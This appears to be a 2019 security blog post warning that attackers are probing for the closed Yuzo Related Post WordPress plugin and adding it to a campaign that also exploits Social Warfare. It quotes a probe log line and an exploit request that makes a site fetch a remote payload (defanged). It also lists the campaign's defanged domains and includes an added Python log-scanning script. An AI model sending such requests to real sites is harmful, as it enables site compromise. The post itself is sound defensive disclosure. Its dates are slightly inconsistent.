Wednesday, April 24, 2019

Attacks on closed WordPress plugins

The WordPress plugin repository team can close plugins and restrict downloads when they learn of a security issue that developers cannot fix quickly.

However, bad actors actively monitor the WordPress plugin repository and pay close attention to these closed plugins. This can lead to massive attacks if the attacker can detect and exploit the vulnerability.

That's the case for the Yuzo Related Post plugin, version 12/5/91. It was closed on March 30, so new users could not download it. But the last time we looked, it still had 60,000+ active installations.

Yuzo Related Post WordPress Plugin

Unfortunately, bad actors started probing sites for this plugin to see if it was installed:

140.143.195.86 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP/1.1" - - "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

Addition to an existing malicious campaign

We recently reported how attackers abused multiple plugins by injecting malicious scripts into them. This is a typical, current example of how this malware campaign targets websites with a vulnerable Social Warfare plugin:

140.143.195.86 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=hxxps://pastebin[.]de/raw/HeKe9uqn HTTP/1.1" - 0 "-" "-"

We see that new domains are also used:

clevertrafficincome[.]com - Creation Date: 2019-04-05
Hellofromhony[.]org - Creation Date: 2019-04-09
notifymepush[.]info
Pushmeandtouchme[.]info

As the source IP address shows, this malware campaign has added the Yuzo Related Post plugin to its list of targets.
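To check your own access logs for the same two request patterns and for sources that show both, the following Python is an added example, not code from the original post. The function names and the sample log lines are constructed for illustration, and it assumes a common or combined access-log format.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Access-log prefix: client IP, timestamp, request line, status ("-" if not logged).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" ?(?P<status>\d{3}|-)')
YUZO_PATH = "/wp-content/plugins/yuzo-related-post/"

def classify(target):
    """Label a request target that matches one of the two log patterns, else None."""
    parts = urlsplit(target)
    if parts.path.lower().startswith(YUZO_PATH):
        return "yuzo-probe"
    query = parse_qs(parts.query, keep_blank_values=True)
    if (parts.path.endswith("/wp-admin/admin-ajax.php")
            and "swp_debug" in query and "swp_url" in query):
        return "swp_url-request"
    return None

def scan(lines):
    """Return {ip: set of labels} and the IPs whose Yuzo probe got a 200."""
    hits, found_plugin = defaultdict(set), set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        label = classify(m.group("target"))
        if label is None:
            continue
        hits[m.group("ip")].add(label)
        if label == "yuzo-probe" and m.group("status") == "200":
            found_plugin.add(m.group("ip"))
    return dict(hits), found_plugin

def multi_plugin_sources(hits):
    """IPs seen with both patterns: one source working through several plugins."""
    return sorted(ip for ip, labels in hits.items() if len(labels) > 1)

# Constructed sample lines (documentation IP ranges, placeholder URL).
SAMPLE = [
    '192.0.2.10 - - [08/Apr/2019:22:56:29 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Apr/2019:22:56:35 +0000] "GET /wp-admin/admin-ajax.php?swp_debug=load_options&swp_url=https://example.invalid/raw/x HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.7 - - [08/Apr/2019:23:01:02 +0000] "GET /wp-content/plugins/yuzo-related-post/assets/js/admin.js HTTP/1.1" 404 0 "-" "-"',
    '203.0.113.5 - - [08/Apr/2019:23:02:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    hits, found = scan(SAMPLE)
    print("matched sources:", hits)
    print("probe answered with 200:", sorted(found))
    print("both patterns:", multi_plugin_sources(hits))
```

A match is a lead for review rather than proof of compromise: on a site that has the plugin installed, logged-in administrators can also request files under the plugin path.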

Details of the vulnerability

Specifically, the Yuzo Related Post plugin has an unauthenticated cross-site scripting (XSS) vulnerability. Several other vulnerabilities also remained unresolved, which was the main reason the WordPress team closed it.

In order to give users time to remove this plugin from their websites, we do not provide any further details here. Remember that attackers are already exploiting it.

Today, April 10, 2019, we see many posts in the WordPress support forum about hacks of sites using the plugin. The plugin author even had to announce that the plugin should be uninstalled immediately.

Remove the Yuzo Related Post plugin immediately

If you cannot remove this plugin, we recommend adding a second layer of security that virtually patches vulnerabilities when developers do not fix the security issues.
